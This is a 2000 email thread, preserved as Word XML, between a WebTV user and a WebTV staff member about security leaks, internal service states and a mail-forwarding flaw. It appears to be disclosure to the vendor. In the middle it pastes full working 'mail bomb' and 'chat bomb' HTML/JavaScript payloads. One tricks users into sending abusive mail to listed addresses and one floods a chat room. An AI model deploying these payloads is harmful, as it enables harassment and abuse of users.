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: ulTRAX@webtv.net [mailto:ulTRAX@webtv.net]</w:t>
        <w:br/>
        <w:t>Sent: Thursday, May 18, 2000 9:24 AM</w:t>
        <w:br/>
        <w:t>To: Michael Donnelly</w:t>
        <w:br/>
        <w:t xml:space="preserve">Subject: RE: what is this? </w:t>
        <w:br/>
        <w:t>You were probably trying to write me to explain just what all that</w:t>
        <w:br/>
        <w:t>private connection data was but you found my box full. Right? OK, I made</w:t>
        <w:br/>
        <w:t xml:space="preserve">room ;-) </w:t>
        <w:br/>
        <w:t>And you already know about the Accipiter ad server data too? Here's an</w:t>
        <w:br/>
        <w:t xml:space="preserve">example: http://members.tripod.com/~ulTRICK/accipiter.html </w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Message From: michaeld@corp.webtv.net (Michael Donnelly) Date:</w:t>
        <w:br/>
        <w:t>Thu, May 18, 2000, 11:53am (EDT-3) To: ulTRAX@webtv.net Subject: RE:</w:t>
        <w:br/>
        <w:t xml:space="preserve">what is this? </w:t>
        <w:br/>
        <w:t xml:space="preserve">Hi Ultrax, </w:t>
        <w:br/>
        <w:t>I guess I could just write to Robb, but that's not it. I have been busy</w:t>
        <w:br/>
        <w:t xml:space="preserve">doing some testing and running Client 2.5 through the best hack sites. </w:t>
        <w:br/>
        <w:t xml:space="preserve">2.5 looks pretty solid, i think you will be pleased. </w:t>
        <w:br/>
        <w:t xml:space="preserve">Paul sends his &lt;sarcasm&gt; warm regards.&lt;/sarcasm&gt; </w:t>
        <w:br/>
        <w:t xml:space="preserve">Now down to business. </w:t>
        <w:br/>
        <w:t>The information you sent is in the form of a user credential. It is</w:t>
        <w:br/>
        <w:t>dated, the date on the one you sent was November 1999. This hole is</w:t>
        <w:br/>
        <w:t>closed. If you can still get fresh data, please let us know. The news</w:t>
        <w:br/>
        <w:t>server leak is closed as well. If it is not, please let us know. I read</w:t>
        <w:br/>
        <w:t>your accipiter page. It has more information about accipiter than our</w:t>
        <w:br/>
        <w:t xml:space="preserve">accipiter page. </w:t>
        <w:br/>
        <w:t>Ours talks of Ad Campigns and Demographics. Information is dealt with in</w:t>
        <w:br/>
        <w:t>aggregate on the back end. Nobody is looking down to the user-level</w:t>
        <w:br/>
        <w:t xml:space="preserve">except computers. </w:t>
        <w:br/>
        <w:t xml:space="preserve">About Flash: </w:t>
        <w:br/>
        <w:t>Flash is best described as "a state of mind" rather than an actual user.</w:t>
        <w:br/>
        <w:t>Flash is a service state between the box and the service used for</w:t>
        <w:br/>
        <w:t>firmware downloads. That is why you can take a cancelled box or a</w:t>
        <w:br/>
        <w:t>never-subscribed box and download an upgrade using 8675309. Since it is</w:t>
        <w:br/>
        <w:t>not a user account, it has limited services. Tricks access does not work</w:t>
        <w:br/>
        <w:t>while in Flash. I was in flash the other night. See the fav. folder</w:t>
        <w:br/>
        <w:t>marked WNI-Was-Here. The reason flash is even around is because when you</w:t>
        <w:br/>
        <w:t>tell a classic to retrieve an upgrade, it is so brain dead, it can</w:t>
        <w:br/>
        <w:t xml:space="preserve">barely dial the phone and say it's SSID#. </w:t>
        <w:br/>
        <w:t xml:space="preserve">About Demo: </w:t>
        <w:br/>
        <w:t>Demo is another "state of mind." It is not a user. I was in there too.</w:t>
        <w:br/>
        <w:t>It is the state of the relationship between the box and service when an</w:t>
        <w:br/>
        <w:t>OK SSID# has accessed the service, but a state of user services has not</w:t>
        <w:br/>
        <w:t>been agreed to between the box and service, such as when you are at the</w:t>
        <w:br/>
        <w:t xml:space="preserve">choose a user screen. </w:t>
        <w:br/>
        <w:t>As you know, Service-Cookie-Default-User is not an actual user either.</w:t>
        <w:br/>
        <w:t>It lives in a different database, I doubt that since I can't even make</w:t>
        <w:br/>
        <w:t>changes to that account, the best MASTA HACKA won't even come close</w:t>
        <w:br/>
        <w:t xml:space="preserve">either, and I have a Windows 2000 based GUI to work through. </w:t>
        <w:br/>
        <w:t>Cheers,</w:t>
        <w:br/>
        <w:t>Mike</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">-----Original Message----- </w:t>
        <w:br/>
        <w:t>From: ulTRAX@webtv.net [mailto:ulTRAX@webtv.net]</w:t>
        <w:br/>
        <w:t>Sent: Thursday, May 18, 2000 3:05 PM</w:t>
        <w:br/>
        <w:t>To: Michael Donnelly</w:t>
        <w:br/>
        <w:t xml:space="preserve">Subject: Mail and Chat bombs </w:t>
        <w:br/>
        <w:t>Thanks for the explanation of FLASH and DEMO. What they were has always</w:t>
        <w:br/>
        <w:t>been a source of speculation. DEMO used to be quite the madhouse prior</w:t>
        <w:br/>
        <w:t>to Feb 98 when WNI first acted to shut it down. I did try to organize a</w:t>
        <w:br/>
        <w:t>few efforts to study it. If the Cookie List was any indication, it did</w:t>
        <w:br/>
        <w:t>seem like there were at least 12 DEMOS (were there just 12 different</w:t>
        <w:br/>
        <w:t>cookie IPs?) . What was really bizarre about DEMO was that some browser</w:t>
        <w:br/>
        <w:t>page seemed to be able to float about between DEMOS. Even FAV folders</w:t>
        <w:br/>
        <w:t>could float independently of each other. The Cookie List was the only</w:t>
        <w:br/>
        <w:t xml:space="preserve">constant that could be studied LOL. </w:t>
        <w:br/>
        <w:t>Here's a few bombs I collected.... both hijack some function of a user's</w:t>
        <w:br/>
        <w:t>box. I have not tested the mail bomb to see if it's been fixed. The CHAT</w:t>
        <w:br/>
        <w:t>bomb did seem to flood the targeted chat room.... but I never did any</w:t>
        <w:br/>
        <w:t xml:space="preserve">experiments. </w:t>
        <w:br/>
        <w:t>MAIL BOMB CODE</w:t>
        <w:br/>
        <w:t>&lt;html&gt;&lt;br&gt;&lt;TR&gt;&lt;center&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">&lt;body bgcolor="black" text="yellow"&gt; </w:t>
        <w:br/>
        <w:t>click here for my sex pics &lt;/center&gt;&lt;br&gt;&lt;tr&gt; &lt;font color="yellow"&gt;&lt;form</w:t>
        <w:br/>
        <w:t>method="post" action="mailto:Frank___Rizzo@webtv.net,Z4p4t1</w:t>
        <w:br/>
        <w:t>st4@webtv.net,chezck@webtv.net,ulTRAX@webtv.n</w:t>
        <w:br/>
        <w:t>et,redrumredrumred@webtv.net,jasmat14@webtv.n</w:t>
        <w:br/>
        <w:t>et,testversion1@webtv.net,SpiderMonkey6x3@web</w:t>
        <w:br/>
        <w:t>tv.net,Round_Kid@webtv.net,Bond0071718@webtv.</w:t>
        <w:br/>
        <w:t>net,serverdata@webtv.net,Frank___Rizzo@webtv.</w:t>
        <w:br/>
        <w:t>net,FlashLogic@webtv.net?no_signature=true" enctype="text/plain"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">&lt;center&gt; </w:t>
        <w:br/>
        <w:t>&lt;textarea bgcolor="black" text="black"</w:t>
        <w:br/>
        <w:t xml:space="preserve">cursor="black" name="message" rows="1" </w:t>
        <w:br/>
        <w:t>cols="30" nohighlight autoactivate&gt;hello bitches how are you today well</w:t>
        <w:br/>
        <w:t xml:space="preserve">i guess im a stupid moron and pushed a button that I did'nt </w:t>
        <w:br/>
        <w:t>know</w:t>
        <w:br/>
        <w:t>what it would do &lt;/textarea&gt; &lt;/center&gt;</w:t>
        <w:br/>
        <w:t>&lt;center&gt;</w:t>
        <w:br/>
        <w:t>&lt;/tr&gt;</w:t>
        <w:br/>
        <w:t>&lt;tr&gt;</w:t>
        <w:br/>
        <w:t>&lt;font color="black"&gt;</w:t>
        <w:br/>
        <w:t>&lt;center&gt;</w:t>
        <w:br/>
        <w:t>&lt;input type="submit" value="click here"</w:t>
        <w:br/>
        <w:t>text="red"&gt; &lt;/center&gt;</w:t>
        <w:br/>
        <w:t>&lt;font color="black"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">&lt;/html&gt; </w:t>
        <w:br/>
        <w:t xml:space="preserve">======================== </w:t>
        <w:br/>
        <w:t xml:space="preserve">CHAT BOMB CODE </w:t>
        <w:br/>
        <w:t>&lt;WTVCHAT host=irc.coolchat.net port=6667 channel="#TeenAge3000"&gt; &lt;table</w:t>
        <w:br/>
        <w:t>border=15 bgcolor=000000"&gt;&lt;tr&gt; &lt;body bgcolor=000000 fontsize=small</w:t>
        <w:br/>
        <w:t>display logo="http://www.geocities.com/v_mind/grafix/ircmail.gif"</w:t>
        <w:br/>
        <w:t>onLoad="timer=setTimeout('Intro()',5000)"&gt; &lt;script</w:t>
        <w:br/>
        <w:t xml:space="preserve">language="javascript"&gt; function Intro(){ </w:t>
        <w:br/>
        <w:t xml:space="preserve">Chat.AddChannelMessage("OOOOOOOO </w:t>
        <w:br/>
        <w:t>OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"); Chat.AddChannelMessage("DonnieG</w:t>
        <w:br/>
        <w:t xml:space="preserve">Rules! No Need to Thank Me! HeH Have fun </w:t>
        <w:br/>
        <w:t>Watching these Floods! They Wont EVER stop, so everybody better find a</w:t>
        <w:br/>
        <w:t>new chat room to chat in! U can visit this Msg Board and beg me to</w:t>
        <w:br/>
        <w:t>please stop, http://tapboard.cjb.net"); } &lt;/script&gt; &lt;td colspan=2&gt; &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">&lt;/tr&gt;&lt;/td&gt;&lt;/table&gt; </w:t>
        <w:br/>
        <w:t>&lt;table width=0 border=0 b&lt;gcolor=000000&gt;&lt;td&gt; &lt;/table&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">&lt;/html&gt; </w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Message From: michaeld@corp.webtv.net (Michael Donnelly) Date:</w:t>
        <w:br/>
        <w:t>Thu, May 18, 2000, 3:28pm (EDT-3) To: ulTRAX@webtv.net Subject: RE: Mail</w:t>
        <w:br/>
        <w:t xml:space="preserve">and Chat bombs </w:t>
        <w:br/>
        <w:t xml:space="preserve">Thanks! That's good stuff. </w:t>
        <w:br/>
        <w:t>We saw the mail bomb. Someone was kind enough to post in ADWH where it</w:t>
        <w:br/>
        <w:t>was so we were able to go into that group and remove the post. That is a</w:t>
        <w:br/>
        <w:t>proper technical use of forms, so not really a hack. The case was</w:t>
        <w:br/>
        <w:t xml:space="preserve">referred anyway to the bouncer for action. </w:t>
        <w:br/>
        <w:t>As you know, click and go forms carry a warning. Perhaps the warning</w:t>
        <w:br/>
        <w:t>could be expanded to include the recipients' names. I don't know if that</w:t>
        <w:br/>
        <w:t xml:space="preserve">would help in this case.. </w:t>
        <w:br/>
        <w:t>You may have realized that for almost everything on the network there is</w:t>
        <w:br/>
        <w:t>more than one IP/resource. That's the way it has to be for active</w:t>
        <w:br/>
        <w:t>service implementation. The FAVs folders are a side effect so it doesn't</w:t>
        <w:br/>
        <w:t>suprise me in the least that they do not function properly. If</w:t>
        <w:br/>
        <w:t>everything were just so, there wouldn't even be FAV folders in demo or</w:t>
        <w:br/>
        <w:t xml:space="preserve">flash. </w:t>
        <w:br/>
        <w:t xml:space="preserve">I will have to give the chat bomb a "WRL" and see it in action. </w:t>
        <w:br/>
        <w:t>Cheers,</w:t>
        <w:br/>
        <w:t xml:space="preserve">Mike </w:t>
        <w:br/>
        <w:t>P.S. You should come here and work @ web. We have openings and you may</w:t>
        <w:br/>
        <w:t>or may not have to deal with Paul ;).</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">-----Original Message----- </w:t>
        <w:br/>
        <w:t>From: ulTRAX@webtv.net [mailto:ulTRAX@webtv.net]</w:t>
        <w:br/>
        <w:t>Sent: Thursday, May 18, 2000 4:13 PM</w:t>
        <w:br/>
        <w:t>To: Michael Donnelly</w:t>
        <w:br/>
        <w:t xml:space="preserve">Subject: leaks </w:t>
        <w:br/>
        <w:t>Preliminary test on the news and ad server leaks seems to indicate the</w:t>
        <w:br/>
        <w:t>leak is plugged. Was it just plugged or did Paul get the ball rolling a</w:t>
        <w:br/>
        <w:t>few months ago? I hadn't really tried getting the data since then.</w:t>
        <w:br/>
        <w:t>You're right, the example I gave you was from last fall but I had been</w:t>
        <w:br/>
        <w:t xml:space="preserve">able to get the data up until Paul and I had a parting of the ways. </w:t>
        <w:br/>
        <w:t>I had a site for this purpose but deleted most of it when things did not</w:t>
        <w:br/>
        <w:t>go well with Paul. I figured he was the kind of guy who would just</w:t>
        <w:br/>
        <w:t xml:space="preserve">monitor my usage to find out how we were getting the data. </w:t>
        <w:br/>
        <w:t>Any explanation on why the leaks occurred in the first place? Getting</w:t>
        <w:br/>
        <w:t xml:space="preserve">the info we did, especially on other users, was quite the leak. </w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Message From: michaeld@corp.webtv.net (Michael Donnelly) Date:</w:t>
        <w:br/>
        <w:t>Thu, May 18, 2000, 4:40pm (EDT-3) To: ulTRAX@webtv.net Subject: RE:</w:t>
        <w:br/>
        <w:t xml:space="preserve">leaks </w:t>
        <w:br/>
        <w:t xml:space="preserve">Hi Ultrax, </w:t>
        <w:br/>
        <w:t>We made our own ___ (fill in the blank. Most everything is fashioned</w:t>
        <w:br/>
        <w:t xml:space="preserve">here.) Our system is pretty closed by default. </w:t>
        <w:br/>
        <w:t>Planning for a user to torture the box was not front and center and did</w:t>
        <w:br/>
        <w:t>not most likely come up high on the list. I was at Trimble during those</w:t>
        <w:br/>
        <w:t xml:space="preserve">years so I missed out on the formation of this monster. </w:t>
        <w:br/>
        <w:t xml:space="preserve">Paul plugged the leak a months ago, in winter. </w:t>
        <w:br/>
        <w:t>Usage monitoring although it sounds high-tech and glamerous is like</w:t>
        <w:br/>
        <w:t>pulling an angry cat's teeth after you've both had Bourbon. Some of it</w:t>
        <w:br/>
        <w:t xml:space="preserve">is Unix Command line, </w:t>
        <w:br/>
        <w:t>other parts are buried inside a maniacle oracle database and other parts</w:t>
        <w:br/>
        <w:t>are in good old-fashioned server and proxy logs. In short, it is a LOT</w:t>
        <w:br/>
        <w:t xml:space="preserve">of work </w:t>
        <w:br/>
        <w:t>to trace a user's actions and minus a court order/subpoena not something</w:t>
        <w:br/>
        <w:t xml:space="preserve">someone wants to sit around doing. </w:t>
        <w:br/>
        <w:t>Like I said, the information retrieval system is designed to retrive</w:t>
        <w:br/>
        <w:t xml:space="preserve">mostly ad view data in aggregate. </w:t>
        <w:br/>
        <w:t>The support system is designed around basic functions of the units with</w:t>
        <w:br/>
        <w:t xml:space="preserve">low-level information displayed only. </w:t>
        <w:br/>
        <w:t xml:space="preserve">Such things as ANI, </w:t>
        <w:br/>
        <w:t>pop records, User names, that kind of thing. *YAWN* hardly the</w:t>
        <w:br/>
        <w:t xml:space="preserve">information superstore. </w:t>
        <w:br/>
        <w:t>Cheers,</w:t>
        <w:br/>
        <w:t>Mike</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">-----Original Message----- </w:t>
        <w:br/>
        <w:t>From: ulTRAX@webtv.net [mailto:ulTRAX@webtv.net]</w:t>
        <w:br/>
        <w:t>Sent: Tuesday, June 06, 2000 9:12 AM</w:t>
        <w:br/>
        <w:t>To: Michael Donnelly</w:t>
        <w:br/>
        <w:t xml:space="preserve">Subject: mail forwarding </w:t>
        <w:br/>
        <w:t>I wrote you about this before but I just want to be sure you're still</w:t>
        <w:br/>
        <w:t>aware of the danger the mail-forwarding function poses. People are</w:t>
        <w:br/>
        <w:t xml:space="preserve">working on stealing other people's mail. </w:t>
        <w:br/>
        <w:t>Message From: XXXXXXX@webtv.net (XXXXXXX) Date: Tue, Jun 6, 2000,</w:t>
        <w:br/>
        <w:t>XXXXX (EDT-X) To: ulTRAX@webtv.net (///\\ ulTRÅX \\///) Subject: Re:</w:t>
        <w:br/>
        <w:t xml:space="preserve">Fwd: LOL @ you ohh&gt;&gt;ok&gt;&gt; dont confuze me now .lmao. </w:t>
        <w:br/>
        <w:t xml:space="preserve">naw i understood. </w:t>
        <w:br/>
        <w:t>i will admit i "mis-use" my hacking skillz. right now im working on my</w:t>
        <w:br/>
        <w:t>mail-intercepter,im done but should i use it and let it out?&gt;&gt; u</w:t>
        <w:br/>
        <w:t xml:space="preserve">know&gt;??&gt;&gt; </w:t>
        <w:br/>
        <w:t>aight</w:t>
        <w:br/>
        <w:t xml:space="preserve">late- </w:t>
        <w:br/>
        <w:br/>
        <w:t>Message From: michaeld@corp.webtv.net (Michael Donnelly) Date:</w:t>
        <w:br/>
        <w:t>Tue, Jun 6, 2000, 9:13am (EDT-3) To: ulTRAX@webtv.net Subject: RE: mail</w:t>
        <w:br/>
        <w:t xml:space="preserve">forwarding </w:t>
        <w:br/>
        <w:t>It dies tonight.</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">-----Original Message----- </w:t>
        <w:br/>
        <w:t>From: ulTRAX@webtv.net [mailto:ulTRAX@webtv.net]</w:t>
        <w:br/>
        <w:t>Sent: Tuesday, June 06, 2000 9:15 AM</w:t>
        <w:br/>
        <w:t>To: Michael Donnelly</w:t>
        <w:br/>
        <w:t xml:space="preserve">Subject: RE: mail forwarding </w:t>
        <w:br/>
        <w:t>It's a great capability but just needs some security feature added.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Message From: michaeld@corp.webtv.net (Michael Donnelly) Date:</w:t>
        <w:br/>
        <w:t>Tue, Jun 6, 2000, 9:37am (EDT-3) To: ulTRAX@webtv.net Subject: RE: mail</w:t>
        <w:br/>
        <w:t xml:space="preserve">forwarding </w:t>
        <w:br/>
        <w:t>The other folks felt that full POP-3 functionality was a better deal and</w:t>
        <w:br/>
        <w:t xml:space="preserve">that is the direction we went. </w:t>
        <w:br/>
        <w:t>Those 2 url's will die and the "Holders" of those functions are going to</w:t>
        <w:br/>
        <w:t>get "stuck" that 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29:00Z</dcterms:created>
  <dc:creator>xartlu</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>xartlu</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2003-06-10T12:30:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title>From: ulTRAX@webtv</dc:title>
</cp:coreProperties>
</file>